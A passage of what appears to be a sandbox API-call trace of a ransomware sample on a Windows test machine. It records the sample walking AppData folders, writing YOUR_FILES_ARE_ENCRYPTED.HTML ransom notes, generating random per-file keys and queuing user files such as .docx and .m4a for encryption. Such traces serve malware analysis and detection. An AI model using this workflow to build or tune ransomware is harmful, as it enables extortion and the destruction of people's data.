lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.804] CloseHandle (hObject=0x5e4) returned 1 [0164.805] GetProcessHeap () returned 0x270000 [0164.805] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.805] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0164.806] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned 68 [0164.806] GetProcessHeap () returned 0x270000 [0164.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.806] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer" [0164.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*" [0164.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Services", cAlternateFileName="")) returned 1 [0164.806] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") returned 77 [0164.806] GetProcessHeap () returned 0x270000 [0164.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.806] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services" [0164.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" [0164.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.806] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.807] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf040c80, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x10be, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0164.807] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned 127 [0164.807] lstrcmpW (lpString1="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.807] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0164.807] lstrlenW (lpString=".ico") returned 4 [0164.807] PathFindExtensionW (pszPath="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0164.807] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf040c80, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0x0, dwReserved1=0x60, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0164.807] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.807] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0164.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\internet explorer\\services\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.808] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.810] CloseHandle (hObject=0x5b8) returned 1 [0164.811] GetProcessHeap () returned 0x270000 [0164.811] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee9dd60, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaf040c80, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf040c80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Services", cAlternateFileName="")) returned 0 [0164.812] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.812] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0164.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\internet explorer\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0164.812] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.815] CloseHandle (hObject=0x5e4) returned 1 [0164.815] GetProcessHeap () returned 0x270000 [0164.816] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.816] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaee77c00, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaee9dd60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee9dd60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0164.816] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.817] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0164.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.820] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.822] CloseHandle (hObject=0x598) returned 1 [0164.823] GetProcessHeap () returned 0x270000 [0164.823] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.823] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xaee77c00, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaee77c00, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0164.824] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0164.824] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0164.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0164.829] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0164.832] CloseHandle (hObject=0x5a4) returned 1 [0164.833] GetProcessHeap () returned 0x270000 [0164.833] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0164.839] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="Roaming", cAlternateFileName="")) returned 1 [0164.839] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming") returned 39 [0164.839] GetProcessHeap () returned 0x270000 [0164.839] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0164.841] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming" [0164.841] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*" [0164.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0164.841] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaf6f2a60, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaf6f2a60, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.842] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54e693f0, ftCreationTime.dwHighDateTime=0x1d7dbe5, ftLastAccessTime.dwLowDateTime=0x7a56efe0, ftLastAccessTime.dwHighDateTime=0x1d7dbf4, ftLastWriteTime.dwLowDateTime=0x7a56efe0, ftLastWriteTime.dwHighDateTime=0x1d7dbf4, nFileSizeHigh=0x0, nFileSizeLow=0xb393, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-MDlQjdBDlw2Y.m4a", cAlternateFileName="-MDLQJ~1.M4A")) returned 1 [0164.842] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a") returned 57 [0164.842] lstrcmpW (lpString1="-MDlQjdBDlw2Y.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.842] PathFindExtensionW (pszPath="-MDlQjdBDlw2Y.m4a") returned=".m4a" [0164.842] lstrlenW (lpString=".m4a") returned 4 [0164.842] PathFindExtensionW (pszPath="-MDlQjdBDlw2Y.m4a") returned=".m4a" [0164.842] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\-mdlqjdbdlw2y.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.843] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=45971) returned 1 [0164.843] GetProcessHeap () returned 0x270000 [0164.843] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.847] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="7C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D5") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FF") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda42, 
param_2="%02X" | out: param_1="3C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="58") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="ED") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8A") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="65") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5B") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="80") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F1") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CE") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9D") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="7D") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1C") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7A") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AA") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="87") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="00") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A4") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="76") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="61") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="8B") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="84") returned 2 [0164.848] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BF") returned 2 [0164.849] wsprintfW 
(in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="73") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0D") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="AD") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="97") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="78") returned 2 [0164.849] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0164.850] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\-MDlQjdBDlw2Y.m4a" [0164.850] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.850] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.850] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99d783c0, ftCreationTime.dwHighDateTime=0x1d7e081, ftLastAccessTime.dwLowDateTime=0xa8c58570, ftLastAccessTime.dwHighDateTime=0x1d7e0d2, ftLastWriteTime.dwLowDateTime=0xa8c58570, ftLastWriteTime.dwHighDateTime=0x1d7e0d2, nFileSizeHigh=0x0, nFileSizeLow=0x1316f, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="3lBzAWDiAW5xAw.docx", cAlternateFileName="3LBZAW~1.DOC")) returned 1 [0164.850] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx") returned 59 [0164.850] lstrcmpW (lpString1="3lBzAWDiAW5xAw.docx", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.850] PathFindExtensionW (pszPath="3lBzAWDiAW5xAw.docx") returned=".docx" [0164.850] lstrlenW (lpString=".docx") returned 5 [0164.850] PathFindExtensionW (pszPath="3lBzAWDiAW5xAw.docx") returned=".docx" [0164.850] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\3lbzawdiaw5xaw.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.864] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=78191) returned 1 [0164.864] GetProcessHeap () returned 0x270000 [0164.867] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.868] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B9") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="62") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="EC") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C4") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="92") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="BC") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="2E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="1E") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="11") returned 2 [0164.868] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="84") returned 2 
[0164.869] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1F") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F2") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="66") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2F") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E9") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="4D") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="6D") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="03") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda86, 